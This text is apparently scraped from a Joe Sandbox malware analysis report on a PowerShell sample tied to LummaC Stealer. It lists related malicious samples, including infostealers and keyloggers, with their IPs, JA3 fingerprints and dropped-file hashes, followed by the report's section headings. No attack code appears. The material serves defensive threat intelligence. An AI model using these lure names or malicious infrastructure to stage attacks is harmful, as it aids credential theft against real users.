	4Osfx7gnSx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.104.113.237
	fqJIOoSp5U.dll	Get hash	malicious	Unknown	Browse	91.206.178.125
	QZzvG5G6VE.exe	Get hash	malicious	Stealc	Browse	91.206.178.118
	mrkjKujfkP.exe	Get hash	malicious	Stealc	Browse	91.206.178.118
	vR19oQpY8c.exe	Get hash	malicious	Stealc	Browse	91.206.178.118
	sql.tmp.dll.dll	Get hash	malicious	Unknown	Browse	91.206.178.125
	UrQrIdRfCg.exe	Get hash	malicious	Unknown	Browse	185.104.112.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	XkgoE6Yb52.ps1	Get hash	malicious	Unknown	Browse	35.208.212.94
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	35.208.212.94
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	35.208.212.94
	Commercial Invoice Confirmation-1132346.vbs	Get hash	malicious	Unknown	Browse	35.208.212.94
	jjmax il.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	35.208.212.94
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.208.212.94
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.208.212.94
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.208.212.94
	FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe	Get hash	malicious	DBatLoader, Snake Keylogger, VIP Keylogger	Browse	35.208.212.94
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	35.208.212.94
a0e9f5d64349fb13191bc781f81f42e1	LWLwodPZiq.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	Xw9oZv75Ze.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	LWWWDBoeGo.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, Vidar	Browse	188.114.97.3
	hHtR1O06GH.exe	Get hash	malicious	Amadey, Healer AV Disabler, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	lX1M7MPt7Y.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	lABrOaOkQK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer	Browse	188.114.97.3
	Aura.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3
	installer-unpadded.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	keynote.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	JJsploit_fix.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3

Process:	C:\Windows\Temp\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report get_txt.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\091AF3BA01C3CA5E.dat

Windows Analysis Report
get_txt.ps1